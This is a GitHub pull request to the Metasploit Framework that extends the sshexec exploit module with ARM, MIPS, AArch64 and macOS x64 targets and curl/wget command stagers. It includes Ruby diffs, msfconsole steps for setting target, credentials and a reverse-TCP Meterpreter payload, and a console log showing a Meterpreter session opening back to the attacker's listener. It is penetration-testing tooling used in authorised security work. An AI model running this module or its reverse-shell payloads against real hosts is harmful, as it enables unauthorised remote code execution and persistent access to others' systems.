### PR TITLE
Add targets to sshexec

### DIFF
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops'  => true
         },
       'Platform'         => %w{ linux osx python },
-      'CmdStagerFlavor'  => %w{ bourne echo printf curl wget },
+      'CmdStagerFlavor'  => %w{ bourne echo printf wget },
       'Targets'          =>
         [
           [ 'Linux x86',
@@ -55,11 +55,38 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux'
             }
           ],
+          [ 'Linux armle',
+            {
+              'Arch'     => ARCH_ARMLE,
+              'Platform' => 'linux'
+            }
+          ],
+          [ 'Linux mipsle',
+            {
+              'Arch'     => ARCH_MIPSLE,
+              'Platform' => 'linux',
+               'CmdStagerFlavor'  => %w{curl wget}
+            }
+          ],
+          [ 'Linux mipsbe',
+            {
+              'Arch'     => ARCH_MIPSBE,
+              'Platform' => 'linux',
+               'CmdStagerFlavor'  => %w{ wget }
+            }
+          ],
+          [ 'Linux aarch64',
+            {
+              'Arch'     => ARCH_AARCH64,
+              'Platform' => 'linux'
+            }
+          ],
           [ 'OSX x86',
             {
               'Arch'     => ARCH_X86,
-              'Platform' => 'osx'
-            }
+              'Platform' => 'osx',
+               'CmdStagerFlavor'  => %w{curl wget}
+           }
           ],
           [ 'OSX x64',
             {
@@ -139,8 +166,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    execute_command('uname -a')
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
-
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
     if target['Platform'] == 'python'
       execute_command("python -c \"#{payload.encoded}\"")

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -135,10 +135,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, opts = {})
     vprint_status("Executing #{cmd}")
     begin
-      Timeout.timeout(3) do
+      Timeout.timeout(5) do
         self.ssh_socket.exec!("#{cmd}\n")
       end
-    rescue ::Exception
+    rescue Timeout::Error
+      print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.")
+      print_good("You will likely still get a shell; run sessions -l to be sure.")
     end
   end
 
@@ -175,7 +177,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    execute_command('uname -a')
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
     if target['Platform'] == 'python'

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
         OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
-        Opt::RHOST('RHOST', [ true, "The target address" ]),
+        Opt::RHOST(),
         Opt::RPORT(22)
       ], self.class
     )
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
       non_interactive: true
     }
 
-    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
+    opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG'])
 
     begin
       self.ssh_socket = Net::SSH.start(ip, user, opt_hash)

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -134,14 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, opts = {})
     vprint_status("Executing #{cmd}")
-    begin
-      Timeout.timeout(5) do
-        self.ssh_socket.exec!("#{cmd}\n")
-      end
-    rescue Timeout::Error
-      print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.")
-      print_good("You will likely still get a shell; run sessions -l to be sure.")
-    end
+    self.ssh_socket.exec!("#{cmd}\n")
   end
 
   def do_login(ip, user, pass, port)
@@ -155,8 +148,9 @@ class MetasploitModule < Msf::Exploit::Remote
       proxy:           factory,
       non_interactive: true
     }
-
-    opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG'])
+    if (datastore['SSH_DEBUG'])
+      opt_hash[:verbose] = :debug
+    end
 
     begin
       self.ssh_socket = Net::SSH.start(ip, user, opt_hash)

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -35,11 +35,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Payload'          =>
         {
-          'Space'        => 4096,
+          'Space'        => 800000,
           'BadChars'     => "",
           'DisableNops'  => true
         },
       'Platform'         => %w{ linux osx python },
+      'CmdStagerFlavor'  => %w{ bourne echo printf curl wget },
       'Targets'          =>
         [
           [ 'Linux x86',
@@ -60,6 +61,13 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'osx'
             }
           ],
+          [ 'OSX x64',
+            {
+              'Arch'     => ARCH_X64,
+              'Platform' => 'osx',
+              'CmdStagerFlavor'  => %w{curl wget}
+            }
+          ],
           [ 'Python',
             {
               'Arch'     => ARCH_PYTHON,
@@ -67,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'CmdStagerFlavor'  => %w{ bourne echo printf },
       'DefaultTarget'    => 0,
       # For the CVE
       'DisclosureDate'   => 'Jan 01 1999'
@@ -77,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
         OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
-        OptString.new('RHOST', [ true, "The target address" ]),
+        Opt::RHOST('RHOST', [ true, "The target address" ]),
         Opt::RPORT(22)
       ], self.class
     )

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize
     super(
       'Name'             => 'SSH User Code Execution',
-      'Description'      => %q{
+      'Description'      => %q(
         This module connects to the target system and executes the necessary
         commands to run the specified payload via SSH. If a native payload is
         specified, an appropriate stager will be used.
-      },
+      ),
       'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
       'References'       =>
         [
@@ -39,63 +39,72 @@ class MetasploitModule < Msf::Exploit::Remote
           'BadChars'     => "",
           'DisableNops'  => true
         },
-      'Platform'         => %w{ linux osx python },
-      'CmdStagerFlavor'  => %w{ bourne echo printf wget },
+      'Platform'         => %w[linux osx python],
+      'CmdStagerFlavor'  => %w[bourne echo printf wget],
       'Targets'          =>
         [
-          [ 'Linux x86',
+          [
+            'Linux x86',
             {
               'Arch'     => ARCH_X86,
               'Platform' => 'linux'
             }
           ],
-          [ 'Linux x64',
+          [
+            'Linux x64',
             {
               'Arch'     => ARCH_X64,
               'Platform' => 'linux'
             }
           ],
-          [ 'Linux armle',
+          [
+            'Linux armle',
             {
               'Arch'     => ARCH_ARMLE,
               'Platform' => 'linux'
             }
           ],
-          [ 'Linux mipsle',
+          [
+            'Linux mipsle',
             {
-              'Arch'     => ARCH_MIPSLE,
-              'Platform' => 'linux',
-               'CmdStagerFlavor'  => %w{curl wget}
+              'Arch'             => ARCH_MIPSLE,
+              'Platform'         => 'linux',
+              'CmdStagerFlavor'  => %w[curl wget]
             }
           ],
-          [ 'Linux mipsbe',
+          [
+            'Linux mipsbe',
             {
-              'Arch'     => ARCH_MIPSBE,
-              'Platform' => 'linux',
-               'CmdStagerFlavor'  => %w{ wget }
+              'Arch'             => ARCH_MIPSBE,
+              'Platform'         => 'linux',
+              'CmdStagerFlavor'  => %w[wget]
             }
           ],
-          [ 'Linux aarch64',
+          [
+            'Linux aarch64',
             {
               'Arch'     => ARCH_AARCH64,
               'Platform' => 'linux'
             }
           ],
-          [ 'OSX x86',
+          [
+            'OSX x86',
             {
-              'Arch'     => ARCH_X86,
-              'Platform' => 'osx',
-               'CmdStagerFlavor'  => %w{curl wget}
-           }
-          ],
-          [ 'OSX x64',
-            {
-              'Arch'     => ARCH_X64,
-              'Platform' => 'osx',
-              'CmdStagerFlavor'  => %w{curl wget}
+              'Arch'             => ARCH_X86,
+              'Platform'         => 'osx',
+              'CmdStagerFlavor'  => %w[curl wget]
             }
           ],
-          [ 'Python',
+          [
+            'OSX x64',
+            {
+              'Arch'             => ARCH_X64,
+              'Platform'         => 'osx',
+              'CmdStagerFlavor'  => %w[curl wget]
+            }
+          ],
+          [
+            'Python',
             {
               'Arch'     => ARCH_PYTHON,
               'Platform' => 'python'
@@ -136,16 +145,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def do_login(ip, user, pass, port)
     factory = ssh_socket_factory
     opt_hash = {
-      :auth_methods  => ['password', 'keyboard-interactive'],
-      :port          => port,
-      :use_agent     => false,
-      :config        => false,
-      :password      => pass,
-      :proxy         => factory,
-      :non_interactive => true
+      auth_methods:    ['password', 'keyboard-interactive'],
+      port:            port,
+      use_agent:       false,
+      config:          false,
+      password:        pass,
+      proxy:           factory,
+      non_interactive: true
     }
 
-    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
 
     begin
       self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
@@ -172,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if target['Platform'] == 'python'
       execute_command("python -c \"#{payload.encoded}\"")
     else
-      execute_cmdstager({:linemax => 500})
+      execute_cmdstager(linemax: 500)
     end
 
     self.ssh_socket.close

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -134,7 +134,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, opts = {})
     vprint_status("Executing #{cmd}")
-    self.ssh_socket.exec!("#{cmd}\n")
+    begin
+      Timeout.timeout(5) do
+        self.ssh_socket.exec!("#{cmd}\n")
+      end
+    rescue Timeout::Error
+      print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.")
+      print_good("You will likely still get a shell; run sessions -l to be sure.")
+    end
   end
 
   def do_login(ip, user, pass, port)
@@ -148,9 +155,8 @@ class MetasploitModule < Msf::Exploit::Remote
       proxy:           factory,
       non_interactive: true
     }
-    if (datastore['SSH_DEBUG'])
-      opt_hash[:verbose] = :debug
-    end
+
+    opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG'])
 
     begin
       self.ssh_socket = Net::SSH.start(ip, user, opt_hash)


### PR DESCRIPTION
This adds extra targets to sshexec and specifies stagers for targets, specifically:
```
linux armle
linux mipsle
linux mipsbe
linux aarch64
osx x64
```

Basically, I wanted an easy way to get meterpreter sessions on hosts with sshd and I was modifying shell_to_meterpreter, but I think this module is far simpler, more transparent, and more powerful, so I'm going to close https://github.com/rapid7/metasploit-framework/pull/8986 in lieu of this PR.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/ssh/sshexec`
- [x] `set rhost <target_ip>`
- [x] `set username <username>`
- [x] `set password <password>`
- [x] `set target <target_id>`
- [x] `set payload <meterpreter_payload>`
- [x] `set L/R/HOST <IP>`
- [x] `set LPORT <PORT>`
- [x] `run`
- [x] Ignore the error message and run `sessions -l`
- [x] **Verify** sysinfo works
- [x] Repeat on a mac target
- [x] Repeat on a mipsle target
- [x] Repeat on a mipsbe target
- [x] Repeat on an armle target
- [x] Repeat on a linux x86 target
- [x] Repeat on a linux x64 target
- [x] Repeat on an aarch x64 target

I do not have a mipsle or aarch 64 system to test with, so help would be appreciated......

## Example
### Linux x64
```
msf exploit(sshexec) > use exploit/multi/ssh/sshexec 
msf exploit(sshexec) > set target 1
target => 1
msf exploit(sshexec) > set payload linux/x64/meterpreter/reverse_tcpo
[-] The value specified for payload is not valid.
msf exploit(sshexec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(sshexec) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf exploit(sshexec) > set lport 4567
lport => 4567
msf exploit(sshexec) > set username [REDACTED]
username => msfuser
msf exploit(sshexec) > set password [REDACTED]
password => [REDACTED]
msf exploit(sshexec) > set rhost 192.168.134.172
rhost => 192.168.134.172
msf exploit(sshexec) > run

[*] Started reverse TCP handler on 192.168.135.111:4567 
[*] 192.168.134.172:22 - Sending stager...
[*] Command Stager progress -  46.99% done (406/864 bytes)
[*] Sending stage (803888 bytes) to 192.168.134.172
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.134.172:45494) at 2017-11-30 20:25:31 -0600
[-] SSH Timeout Exception will say the Exploit Failed; do not believe it.
[+] You will likely still get a shell; run sessions -l to be sure.
[*] Command Stager progress - 100.00% done (864/864 bytes)
[-] Exploit failed: IOError closed stream
msf exploit(sshexec) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                                 Connection
  --  ----  ----                   -----------                                                 ----------
  1         meterpreter x64/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 192.168.134.172  192.168.135.111:4567 -> 192.168.134.172:45494 (192.168.134.172)

msf exploit(sshexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.134.172
OS           : Ubuntu 16.04 (Linux 4.4.0-93-generic)
Architecture : x64
Meterpreter  : x64/linux
meterpreter > 

```


## Automated tests:
![image](https://user-images.githubusercontent.com/17987018/33465077-5df2459a-d60b-11e7-8148-90b0d5e2ff5c.png)
![image](https://user-images.githubusercontent.com/17987018/33465105-7ee77b26-d60b-11e7-9347-f3d2dcefb564.png)


